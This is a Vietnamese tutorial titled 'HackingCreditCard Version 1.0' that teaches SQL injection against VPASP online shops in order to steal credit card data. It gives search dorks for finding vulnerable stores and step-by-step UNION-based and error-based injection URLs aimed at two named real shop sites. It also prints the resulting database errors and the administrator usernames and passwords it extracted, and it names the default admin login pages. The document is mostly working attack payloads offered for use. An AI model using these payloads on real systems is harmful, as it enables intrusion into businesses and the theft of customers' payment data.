HackingCreditCardVersion1.0---WrittenbyHieupc Hack Shop VPASP thật sự là như thế nào? ( Cập nhật và được phát triển thêm từ nhiều bài viết hướng dẫn trước đây ) CÁCH THỨ 1: Cái này chắc có lẽ cũng có nhiều bạn biết, nếu mình đoán không lầm thě chỉ có 30 %-50 % member là biết cách này, tuy nhiên mình cũng đưa lên đây cho các bạn chýa biết và các bạn đă biết rùi học hỏi thêm ở mình hoặc góp ý thêm cho mình chỗ nào chưa hoàn chỉnh ! Cách này cũng như những cách thông thường là khai thác theo l ỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như OLE DB, JET Database, ASP… Bước 1: Ðể tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật là hiệu quả. Bước này cũng là bước quan trọng nhất vì không có shop lỗi làm sao hack :)) Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good. Từ khoá nên dùng: allinurl:”shopdisplayproducts.asp?id= hoặc allinurl:”shopdisplayproducts.asp?id=1 hoặc allinurl:”shopdisplayproducts.asp?id=2…… Search shop theo Domain .com, .net , .biz… : allinurl:”.com/shopdisplayproducts.asp?id= ; allinurl:”.net/shopdisplayproducts.asp?id= . Ai biết chấm gì nữa thì thay vào :) Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack. Bây giờ mình lấy ví dụ shop này nhé: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1 Oh, 1 em Uk cực ngon không biết có CC. Bây giờ kiểm tra xem nó lỗi không bằng cách thêm vào dấu phẩy ( ` ) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1' Oh site bị lỗi kìa các bạn : Products Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'. /chris/shop$db.asp, line 868 Bý?c 2: Ta bắt đầu thêm vào đoạn code này : %20union%20%20select%201%20from%20tbluser%27 Vào phía sau link shop nhớ bỏ luôn cái dấu phẩy sau ?id=1 nhé, nếu không là không được đâu đấy. Khi thêm xong link sẽ như thế này: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201%20from% 20tbluser%27 Oh không dụ gì đây :) Products Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match. /chris/shop$db.asp, line 868 Còn không biết qua bước 3 nữa, nhưng khoan các bạn hãy xem kinh nghiệm của mình đă khi thêm vào dấu phẩy ( ` ) mà nó hiện ra lỗi như vầy: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ' '. /product.asp, line 29 Thì các bạn hack theo kiểu hack cũ nhé. Thui bây giờ qua bước 3 nhé, nói nhiều quá :)) Sau khi đă hoàn thành bước 2, bạn sẽ bắt đầu 1 công việc thiêng liêng nhất và cũng là mệt mỏi nhất, không mệt đâu chỉ uể oải 1 tí, đó là thêm số vào code: 1%20union%20%20select%201,2%20from%20tbluser%27 1%20union%20%20select%201,2,3%20from%20tbluser%27 1%20union%20%20select%201,2,3,4%20from%20tbluser%27……… Khi thêm vào thì link sẽ như thế này : http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2%20from% 20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3%20from% 20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,4%20from% 20tbluser%27 ………… Cứ thêm số tiếp tục nhé, đừng nản lòng hãy cố lên. Cho đến khi nó xuất hiện 1 cái bảng rất đẹp :)) Ái da, mỏi tay quá tới số 34 mới hiện ra cái bảng trời đánh này :)) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser %27 Đây là bước cuối cùng để lấy user and pass: những con số quan trọng của shop naỳ là : 3, 4 , 22. fldusername <~ thay vào số 4 fldpassword <~ thay vào số 22 Sau khi thay xong link sẽ như thế này: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34%20from %20tbluser%27 Và các bạn đã có user and pass rùi đấy: User: admin848 pass: admin848 User: carste pass: carste Phần còn lại là tìm link admin để login, cái này cũng khá quan trọng vì không có link admin làm sao lấy CC :)) Chú ý: link admin để login mặc định của VPASP là : shopadmin.asp cũng có khi ta đánh shopadmin1.asp sẽ vào link admin. CÁCH HACK THỨ 2 RÚT RA TỪ BÀI HƯỚNG DẪN CỦA ANH HAI Silveryhat_Hacker : Bước 1 tương tự như trên: Ví dụ site này: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153' cũng thêm vào dấu phẩy ( ` ) để check lỗi Products Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /shopping/shopdisplayproducts.asp, line 93 Oh có lỗi rồi, giờ sao đây :)) Cái này anh em biết khai thác chứ: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20table_name%20from%20information_schema.tables))--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 B ước 2 chắc các bạn biết, chỉ là lấy table thui, mình chỉ việc kiếm table nào chưá users của admin là okie. http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20 ('ver_Faq','coupons','customerprices','customers')))--sp_password Products Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminUsers' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 Tới đây là đã quá rõ, cái mình chính là table này : 'AdminUsers' vì sao vậy vì nó chưá user và pass chắc. Thui cứ khai thác thử. Code: %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns% 20where%20table_name=('AdminUsers')))--sp_password Khi thêm code xong sẽ như thế này: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')))-- sp_password Products Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminID' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 Và bước tiếp theo: Code : %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns% 20where%20table_name=('AdminUsers')%20and%20column_name%20not%20in%20('AdminID')))--sp_password Khi thêm code xong sẽ như thế này: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and %20column_name%20not%20in%20('AdminID')))--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 Và các bạn cứ tiếp tục thêm table vào: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and %20column_name%20not%20in%20('AdminID','login')))--sp_password http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and %20column_name%20not%20in%20('AdminID','login','pwd')))--sp_password Okie 2 thông tin quan trọng là 'login','pwd' đă xuất hiện giờ chỉ việc kiếm pass: Code: %20and%201=convert(int,(select%20top%201%20login%2b'/'%2bpwd%20from%20AdminUsers))-- sp_password ặc ặc shop củ khoai: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20login%2b'/'%2bpwd%20from%20AdminUsers))--sp_password Products Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin/admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 Hic hic, user: admin , pass: admin ; đủ biết là shop này thằng admin nó ngu đến cỡ nào Bây giờ kiếm link admin là nhiệm vụ của bạn. . http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id =1% 20union% 20% 20select% 2 01 , 2,3,4,5,6,7,8,9 , 10 ,11 ,12 ,13 ,14 ,15 ,16 ,17 ,18 ,19 , 20, 21, 22,23,24,25,26,27,28,29, 30, 31, 32,33,34%20from%20tbluser %27. http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id =1% 20union% 20% 20select%2 01 , 2,3, fldusername,5,6,7,8,9 , 10 ,11 ,12 ,13 ,14 ,15 ,16 ,17 ,18 ,19 , 20, 21, fldpassword,23,24,25,26,27,28,29, 30, 31, 32,33,34%20from %20tbluser%27